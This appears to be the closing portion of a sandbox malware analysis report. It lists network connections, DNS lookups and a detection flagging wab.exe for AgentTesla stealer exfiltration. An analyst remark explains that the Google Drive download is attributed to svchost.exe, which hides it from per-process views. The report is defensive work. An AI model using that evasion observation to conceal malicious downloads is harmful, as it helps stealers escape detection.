700 svchost.exe | 142.250.186.65:443 | drive.usercontent.google.com | GOOGLE | US | whitelisted
3996 svchost.exe | 20.190.159.23:443 | (no domain) | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
1260 backgroundTaskHost.exe | 104.126.37.162:443 | www.bing.com | Akamai International B.V. | DE | unknown
1260 backgroundTaskHost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted

Note that the drive.google.com and drive.usercontent.google.com connections are attributed to svchost.exe (PID 700), a service host, and not to either powershell.exe instance; a per-process network view filtered on powershell.exe or wab.exe would not show this fetch, and the "whitelisted" reputation of the Google hosts says nothing about what was downloaded.

DNS requests

Domain | IP(s) | Reputation

ocsp.digicert.com | 192.229.221.95 | whitelisted
settings-win.data.microsoft.com | 51.104.136.2 | whitelisted
drive.google.com | 142.250.186.78 | shared
drive.usercontent.google.com | 142.250.186.65 | unknown
www.bing.com | 104.126.37.162, 104.126.37.161, 104.126.37.163, 104.126.37.171, 104.126.37.168, 104.126.37.160, 104.126.37.147, 104.126.37.155, 104.126.37.153 | whitelisted
arc.msn.com | 20.223.35.26 | whitelisted
slscr.update.microsoft.com | 20.12.23.50 | whitelisted
www.microsoft.com | 184.30.21.171 | whitelisted
fe3cr.delivery.mp.microsoft.com | 20.3.187.198 | whitelisted
ocsp.pki.goog | 172.217.16.131 | whitelisted

Threats

PID Process | Class | Message

3352 wab.exe | A Network Trojan was detected | STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP)
2 ETPRO signatures available at the full report